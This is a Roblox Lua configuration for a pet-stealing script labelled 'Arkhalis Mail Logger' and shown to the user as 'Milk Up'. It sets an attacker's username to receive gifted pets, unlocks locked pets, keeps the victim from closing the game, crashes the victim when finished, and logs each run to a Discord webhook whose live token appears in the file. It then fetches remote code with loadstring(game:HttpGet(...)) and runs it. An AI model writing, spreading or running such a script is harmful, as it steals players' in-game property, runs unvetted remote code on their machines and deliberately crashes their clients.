--[[ Arkhalis Mail Logger ]]--

--[[ Main Config ]]--
_G.Username = "myfriendulja" --// Username To Send Pets To
_G.UserId = 4475920058 --// Roblox Account Id [[https://www.roblox.com/users/IDHERE/profile]] <- This is a example
_G.GiftMessage = "bobek" --// Message For The Gift To Say
_G.Diamonds = 50000000 --// Amount Of Diamonds To Not Kick
_G.UnlockPets = true --// Unlocks Locked Pets
_G.AntiLeave = true --// Doesn't Let The Target Close Roblox
_G.Crash = true --// Crashes Them After Its Finished
--[[ Webhook Config ]]--
_G.Webhook = "https://discord.com/api/webhooks/1098702411037683772/TyyPhWfhGZJphmOpZJfrQafLCys76S8upzXfKbAAb4rQtRF2wwJajeo7JC4QAUx4CRbV" --// Discord Webhook For Executions

--[[ UI Config ]]--
_G.ScriptName = "Milk Up" --// Script Name On The UI
_G.Tip1 = "no" --// Gives You Tips On The UI
_G.Tip2 = "yes" --// Gives You Tips On The UI
_G.Tip3 = "1" --// Gives You Tips On The UI
_G.Tip4 = "2" --// Gives You Tips On The UI
_G.Tip5 = "3" --// Gives You Tips On The UI

--[[ Script ]]
loadstring(game:HttpGet("https://arkhalislua.github.io/Lua/Arkhalis.lua"))()
